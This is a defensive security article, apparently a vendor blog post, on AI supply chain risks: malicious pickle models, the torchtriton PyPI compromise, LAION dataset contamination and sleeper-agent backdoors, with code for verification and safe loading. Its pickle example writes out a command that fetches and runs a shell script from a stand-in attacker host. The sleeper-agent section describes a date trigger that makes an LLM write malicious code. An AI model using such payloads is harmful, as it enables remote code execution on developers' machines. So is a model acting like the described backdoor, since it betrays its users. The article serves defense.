AI Supply Chain Security: Pre-trained Models, Datasets & ML Pipeline Risks (2026)
Your AI Has a Supply Chain Problem
Every modern AI application depends on a supply chain of pre-trained models, datasets, libraries, and infrastructure that you didn't build and likely haven't audited. This is the AI equivalent of the SolarWinds attack surface — except the AI supply chain is even less mature.
The AI supply chain includes:
- Pre-trained model weights (Hugging Face Hub, TensorFlow Hub, PyTorch Hub)
- Training datasets (Common Crawl, LAION, custom corpora)
- ML frameworks (PyTorch, TensorFlow, JAX)
- Orchestration libraries (LangChain, LlamaIndex, Haystack)
- Inference infrastructure (vLLM, TGI, Triton)
- Fine-tuning tools (LoRA adapters, PEFT, Unsloth)
Gartner (2025): "By 2027, 40% of AI-related security incidents will stem from the misuse of pre-trained models or compromised training data, rather than direct attacks on AI systems in production."
Real-World AI Supply Chain Attacks
1. Hugging Face Malicious Model Files (2024)
JFrog security researchers discovered over 100 malicious models on Hugging Face Hub that used Python's pickle serialization to execute arbitrary code when loaded.
# How the attack works:
# 1. Attacker uploads a model with a malicious .pkl file
# 2. Developer downloads: model = torch.load("model.pkl")
# 3. pickle.load() executes arbitrary Python code
# 4. Attacker gets reverse shell on developer's machine
import pickle
import os
class MaliciousModel:
def __reduce__(self):
# This runs when pickle.load() deserializes the object
return (os.system, ("curl https://evil.com/shell.sh | bash",))
Impact: Remote code execution on any machine that loads the model. Affected researchers, developers, and CI/CD pipelines.
Mitigation: Hugging Face now supports safetensors format, which stores only tensor data (no executable code). Always use safetensors.
2. PyTorch Nightly Supply Chain Attack (2022)
A malicious package torchtriton was uploaded to PyPI that shadowed a legitimate internal PyTorch dependency. Anyone who installed PyTorch nightly between Dec 25-30, 2022 got the compromised version.
What it stole:
- SSH private keys (
~/.ssh/) - AWS credentials (
~/.aws/) - Git configuration (
~/.gitconfig) /etc/hostsand/etc/resolv.conf- First 1000 files in
$HOME
Timeline:
- Dec 25: Malicious package published
- Dec 30: Discovered and removed
- 5 days of silent exfiltration from AI researchers worldwide
3. LAION-5B Dataset Contamination (2023)
Stanford researchers discovered that LAION-5B, the dataset used to train Stable Diffusion, contained:
- CSAM (child sexual abuse material)
- Copyrighted content
- Personal photographs scraped without consent
- Toxic and hateful content
LAION was forced to take the dataset offline. Any model trained on LAION-5B inherited these contamination risks.
4. Sleeper Agent Backdoors in Fine-tuned Models (2024)
Anthropic researchers demonstrated that LLMs can be fine-tuned with "sleeper agent" behavior that activates only under specific conditions — and that safety training (RLHF) fails to remove these backdoors.
Normal behavior: Model responds helpfully to all queries
Trigger: If the date in the system prompt is after 2025
Backdoor: Model outputs malicious code instead of helpful code
AI Supply Chain Security Framework
Model Provenance Verification
import hashlib
from pathlib import Path
class ModelProvenance:
"""Track and verify model origin, integrity, and lineage."""
def verify_model(self, model_path: str, expected_hash: str) -> dict:
"""Verify model file integrity before loading."""
path = Path(model_path)
# Step 1: Check file format (prefer safetensors)
if path.suffix == ".pkl" or path.suffix == ".pickle":
return {
"safe": False,
"reason": "CRITICAL: Pickle files can execute arbitrary code. "
"Use safetensors format instead."
}
# Step 2: Verify SHA-256 hash
sha256 = hashlib.sha256()
with open(path, "rb") as f:
for chunk in iter(lambda: f.read(8192), b""):
sha256.update(chunk)
actual_hash = sha256.hexdigest()
if actual_hash != expected_hash:
return {
"safe": False,
"reason": f"Hash mismatch. Expected: {expected_hash[:16]}... "
f"Got: {actual_hash[:16]}..."
}
# Step 3: Check model card for known issues
return {
"safe": True,
"format": path.suffix,
"hash": actual_hash,
"verified_at": datetime.utcnow().isoformat(),
}
def safe_load(self, model_path: str):
"""Load model using safe format only."""
from safetensors.torch import load_file
if not model_path.endswith(".safetensors"):
raise ValueError(
"Only .safetensors format is allowed. "
"Convert with: safetensors convert model.bin model.safetensors"
)
return load_file(model_path)
AI Software Bill of Materials (AI SBOM)
An AI SBOM extends the traditional SBOM (CycloneDX/SPDX) to include AI-specific components:
{
"bomFormat": "CycloneDX",
"specVersion": "1.6",
"serialNumber": "urn:uuid:ai-sbom-example",
"components": [
{
"type": "machine-learning-model",
"name": "llama-3.1-8b-instruct",
"version": "1.0.0",
"supplier": {"name": "Meta AI"},
"hashes": [{"alg": "SHA-256", "content": "a1b2c3d4..."}],
"properties": [
{"name": "ml:model_type", "value": "transformer"},
{"name": "ml:training_data", "value": "Undisclosed"},
{"name": "ml:parameters", "value": "8B"},
{"name": "ml:format", "value": "safetensors"},
{"name": "ml:license", "value": "Llama 3.1 Community License"}
]
},
{
"type": "data",
"name": "custom-finetuning-dataset",
"version": "2.1.0",
"hashes": [{"alg": "SHA-256", "content": "e5f6g7h8..."}],
"properties": [
{"name": "data:source", "value": "internal-knowledge-base"},
{"name": "data:records", "value": "150000"},
{"name": "data:pii_scanned", "value": "true"},
{"name": "data:bias_audited", "value": "true"}
]
},
{
"type": "library",
"name": "transformers",
"version": "4.45.0",
"purl": "pkg:pypi/transformers@4.45.0"
},
{
"type": "library",
"name": "torch",
"version": "2.5.1",
"purl": "pkg:pypi/torch@2.5.1"
}
],
"dependencies": [
{
"ref": "llama-3.1-8b-instruct",
"dependsOn": ["custom-finetuning-dataset", "transformers", "torch"]
}
]
}
Dependency Scanning for ML Pipelines
# requirements-ml.txt — Pin EVERYTHING
torch==2.5.1
transformers==4.45.0
safetensors==0.4.5
tokenizers==0.20.3
langchain==0.3.7
langchain-openai==0.2.12
chromadb==0.5.23
sentence-transformers==3.3.1
# NEVER use unpinned versions:
# torch>=2.0 ← VULNERABLE to supply chain attack
# transformers ← VULNERABLE
# Scan ML dependencies for known CVEs
pip-audit --requirement requirements-ml.txt --format json
# Generate SBOM for ML project
cyclonedx-py requirements --format json --output ai-sbom.json
# Check for malicious packages
pip-audit --strict --require-hashes
AI Supply Chain Security Checklist
| Control | Priority | Action |
|---|---|---|
| Use safetensors only | 🔴 Critical | Never load .pkl/.pickle model files |
| Pin all dependencies | 🔴 Critical | Exact versions with hash verification |
| Verify model hashes | 🔴 Critical | SHA-256 against published checksums |
| Generate AI SBOM | 🟡 High | CycloneDX 1.6 with ML component metadata |
| Audit training data | 🟡 High | Scan for PII, toxicity, and legal risks |
| CVE monitoring | 🟡 High | Automated alerts for ML library vulnerabilities |
| Sandbox model loading | 🟡 High | Isolated container for first-time model evaluation |
| Model card review | 🟢 Medium | Check license, training data, intended use |
| Reproducible training | 🟢 Medium | Version datasets, record hyperparameters |
| Model drift detection | 🟢 Medium | Monitor output distribution changes post-deployment |
Key Takeaways
- The AI supply chain is the new attack surface — models, datasets, and ML libraries are all targets
- Never use pickle format — always prefer safetensors for model weights
- Pin and hash all dependencies — ML libraries are high-value supply chain targets
- AI SBOMs are becoming required — the EU AI Act mandates documentation of AI components
- Training data is a liability — audit for PII, bias, toxicity, and legal compliance before training
Generate SBOMs for your projects with ShieldX — CycloneDX 1.5 format, dependency vulnerability scanning, and license compliance checking built in.
Advertisement
Free Security Tools
Try our tools now
Expert Services
Get professional help
OWASP Top 10
Learn the top risks
Related Articles
Software Supply Chain Security: Defending Against Modern Threats
How to protect your applications from supply chain attacks targeting dependencies, build pipelines, and deployment processes.
AI Security: Complete Guide to LLM Vulnerabilities, Attacks & Defense Strategies 2025
Master AI and LLM security with comprehensive coverage of prompt injection, jailbreaks, adversarial attacks, data poisoning, model extraction, and enterprise-grade defense strategies for ChatGPT, Claude, and LLaMA.
AI Security & LLM Threats: Prompt Injection, Data Poisoning & Beyond
A comprehensive analysis of AI/ML security risks including prompt injection, training data poisoning, model theft, and the OWASP Top 10 for LLM Applications. With practical defenses and real-world examples.